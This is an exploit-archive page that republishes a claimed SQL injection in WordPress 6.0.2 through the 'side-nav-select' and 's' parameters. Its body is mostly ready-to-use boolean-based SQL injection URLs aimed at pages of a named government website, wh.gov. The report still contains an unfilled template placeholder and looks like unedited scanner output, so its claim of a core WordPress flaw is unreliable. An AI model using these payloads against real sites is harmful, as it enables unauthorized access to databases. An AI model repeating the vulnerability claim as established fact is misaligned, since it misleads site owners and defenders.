Advertisement






WordPress Core 6.0.2 - 'side-nav-select' SQL Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 Not Disclosed Critical
Author Risk Exploitation Type Date
Not Specified High Remote 2023-01-09
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.039 0.262694

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023010011

Below is a copy:

WordPress Core 6.0.2 - 'side-nav-select' SQL Injection
There is a sql injection vulnerability in the 
WordPress Core 6.0.2 - "side-nav-select" and "s" and "COOKIE" parameter that allows an attacker to easily attack and access the database using the GET SQL INJECTION Boolean Based String method.
Steps To Reproduce:

[add details for how we can reproduce the issue, include key information such as Curl commands, HTTP Request/Response, payload information etc.]
vuln type :SQLInjection
refer address : https://www.wh.gov/briefing-room/
request type : GET
action url : https://www.wh.gov/?s=3796170&side-nav-select=https://www.wh.gov/briefing-room/
parameter : side-nav-select
description : GET SQL INJECTION BooleanBased String
POC : https://www.wh.gov/?s=3796170&side-nav-select=https://www.wh.gov/briefing-room/%27 aNd 6400359=6400359 aNd %276199%27=%276199
vuln type :SQLInjection
refer address : https://www.wh.gov/about-the-white-house/the-grounds/
request type : GET
action url : https://www.wh.gov/?s=2794340&side-nav-select=99999999
parameter : side-nav-select
description : GET SQL INJECTION BooleanBased String
POC : https://www.wh.gov/?s=2794340&side-nav-select=99999999%27/**/oR/**/8412388=8412388/**/aNd/**/%276199%27=%276199
vuln type :SQLInjection
refer address : https://www.wh.gov/
request type : COOKIE
action url : https://www.wh.gov/?s=99999999
parameter : s
description : COOKIE SQL INJECTION BooleanBased String
POC : https://www.wh.gov/?s=99999999%27) oR 3220320=3220320--%20
vuln type : SQLInjection
refer address : https://www.wh.gov/administration/vice-president-harris/
request type : COOKIE
action url : https://www.wh.gov/?side-nav-select=https://www.wh.gov/administration/president-biden/&s=9469962
parameter : s
description : COOKIE SQL INJECTION BooleanBased String
POC : https://www.wh.gov/?side-nav-select=https://www.wh.gov/administration/president-biden/&s=9469962%27)/**/aNd/**/2848463=2848463/**/aNd/**/(%276199%27)=(%276199
vuln type : SQLInjection
refer address : https://www.wh.gov/es/
request type : GET
action url : https://www.wh.gov/es/?s=2163610
parameter : s
description : GET SQL INJECTION BooleanBased Integer
POC : https://www.wh.gov/es/?s=2163610 aNd 4105688=4105688 aNd 7193=7193
vuln type : SQLInjection
refer address : https://www.wh.gov/es/administracion/presidente-biden/
request type : COOKIE
action url : https://www.wh.gov/es/?s=4255397&side-nav-select=https://www.wh.gov/es/administracion/presidente-biden/
parameter : side-nav-select
description : COOKIE SQL INJECTION BooleanBased String
POC : https://www.wh.gov/es/?s=4255397&side-nav-select=https://www.wh.gov/es/administracion/presidente-biden/%27)/**/aNd/**/6672058=6672058/**/aNd/**/(%276199%27)=(%276199

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum